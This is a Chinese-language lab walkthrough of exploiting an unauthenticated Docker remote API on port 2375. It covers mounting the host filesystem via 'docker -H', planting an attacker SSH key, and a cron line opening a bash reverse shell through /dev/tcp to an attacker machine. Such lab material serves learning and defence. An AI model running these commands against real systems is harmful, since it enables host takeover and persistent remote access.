云安全笔记

该未授权访问漏洞是因为Docker API可以执行Docker命令，该接口是目的是取代Docker命令界面，通过URL操作Docker。

为了更贴近实战，所以不使用vulhub搭建docker，直接在宿主机上直接搭建。 首先虚拟机创建一台linux 机器正常安装好docker 接着进行文件备份

cp /lib/systemd/system/docker.service /lib/systemd/system/docker.service.bak

接着编辑

vim /lib/systemd/system/docker.service

把下面一段代码加入文件结尾

保存并退出编辑后，重载守护进程以及重启Docker：

sudo systemctl daemon-reload sudo service docker restart

通过执行命令查看是否开放了远程访问端口：

systemctl status docker.service

如果本地搭建访问不了的话，很大原因是因为防火墙未放行2375端口，放行端口后就可以在其他机器访问到了。

访问192.168.1.11:2375/version，若能访问，证明存在未授权访问漏洞。

目标机：192.168.1.11 攻击机：192.168.1.10

在已经安装docker的vps上，使用-H参数连接目标主机的docker，使用images命令查询目标系统存在的镜像。

使用docker命令创建一个容器，并将宿主机的磁盘挂载到容器中

docker -H tcp://192.168.1.11:2375 run -it -v /:/mnt a98b9e39cc6d /bin/bash

a98b9e39cc6d 是镜像的ID 这条命令的意思是启动一个image ID 为a98b9e39cc6d的容器，并且将该宿主机的根目录挂在到容器的/mnt目录下

如果目标机器上没有镜像就需要先pull一个镜像到目标机上。

docker -H tcp://192.168.1.11:2375 pull busybox

这个镜像很小，方便下载。

有镜像之后就很方便利用了。

docker -H tcp://192.168.1.11:2375 run -it -v /:/mnt 62aedd01bd85 /bin/bash

启动之后就会获得该容器宿主机的shell

因为我们把主机的根目录挂在到了这个容器的/mnt容器下，所以我们可以直接往主机的/root/.ssh目录下写authorized_keys

我们将攻击机的公钥写入authorized_keys

成功免密登陆目标服务器

前面的操作都一致 唯一不同的就是写的命令和路径 有很多种写计划任务的方法 我这里是写入的/var/spool/cron下 把下面一句话写入目录的root文件里

*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.1.10/44444 0>&1

然后开启监听44444端口，稍等一分钟shell就会反弹回来。